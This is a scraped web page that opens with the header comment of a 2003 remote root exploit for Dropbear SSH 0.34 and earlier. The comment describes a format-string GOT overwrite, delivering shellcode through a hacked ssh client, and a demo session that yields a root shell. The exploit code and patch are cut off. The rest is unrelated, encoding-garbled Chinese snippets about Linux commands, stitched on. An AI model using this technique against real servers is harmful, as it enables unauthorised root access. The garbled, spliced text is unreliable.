Linux x86 Dropbear SSH <= 0.34 remote root exploit
/*
* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000
Ïà¹ØÎĵµ£º
´óÖÂÃüÁîÈçÏ£º
tar xvfj lichuanhua.tar.bz2
tar xvfz lichuanhua.tar.gz
tar xvfz lichuanhua.tgz
tar xvf lichuanhua.tar
unzip & ......
LinuxÄں˴úÂë·ÖÎö slab.c by Áõ¿º liukang@bjut.edu.cn
slab.cÀ´×ÔlinuxÄÚºË2.4.22°æ£¬±¾Îļþ°´ÕÕGNUÐÒé·¢²¼¡£
Ò»¡¢×¼±¸ÖªÊ¶£º
slabµÄ¸ÅÄ
Ìá³öµÄÔÒò£ºÓÉÓÚ²Ù×÷ϵͳÔÚÔËÐÐÖл᲻¶Ï²úÉú¡¢Ê¹Óá¢ÊÍ·Å´óÁ¿Öظ´µÄ¶ÔÏó£¬
ËùÒÔ¶ÔÕâÑùµÄÖØ¸´¶ÔÏóµÄÉú³É½øÐиĽø¿ÉÒÔ´ó´óÌá¸ßЧÂÊ
×îÔçÓÉsunµÄ¹¤³ÌʦÌá³ö(1994Äê)²¢Ê×ÏÈÔ ......
Ìí¼ÓÓ²Å̺óÆô¶¯ÐéÄâ»ú£¬ Èç¹ûÌí¼ÓµÄSCSIÓ²ÅÌÕâʱӦ¸Ã¶à³öÒ»¸ösdb/sdc/..µÄÅÌ£¬¿ÉÒÔÓà fdisk -l ²é¿´µ½
·ÖÇøfdisk /dev/sdb ---> n p 1 »Ø³µ »Ø³µ w
¸ñʽ»¯mkfs -t ext3 -c /dev/sdb1
¹ÒÔØµ½Ä³¸öĿ¼ mount /dev/sdb1 /home
vi /etc/fstab Ìí¼ÓÒ»ÐÐ /dev/sdb1 /home ext3 defau ......
ÔÚlinuxÏÂÒ»Ö±±»ÎÞ·¨Ò»ÏÂɾ³ýºÜ¶àÎļþ£¨³¬¹ý1024£©µÄÎÊÌâÀ§ÈÅ£»½ñÌìÕÒÁËһϣ¬·¢ÏÖÓÐÒ»¸öºÜ¼òµ¥µÄ½â¾ö°ì·¨¡£ÔÚterminalÖÐÊäÈë
flora03:/scratch/weibinli> find . -name 'Rubidium*' | xargs rm
¸ÃÃüÁîÒ»ÏÂ×Ó ½«ËùÓÐÒÔRubidium¿ªÍ·µÄÎļþɾ³ýµô¡£ÒÔ´ËÀàÍÆ£¬Ó¦¸Ã¿ÉÒÔ½«rm¸ÄΪcpÒ»´Îcopy´óÊýÄ¿µÄÎļþ¡£
......
1 ¾³£ÐèÒª¿Ì¼ ISO Îļþ£¬cdrecord ¿ÉÒÔʵÏÖ
cdrecord ÆäʵÊÇÒ»¸öÈíÁ´½Ó
lrwxrwxrwx 1 root root 5 2009-05-04 22:42 /usr/bin/cdrecord -> wodim
¿Ì¼µÄÃüÁîÈçÏ£º
wodim -v dev=6,0,0 xx.iso # dev ¿ÉÒÔÓà --scanbus ²é¿´
2 ......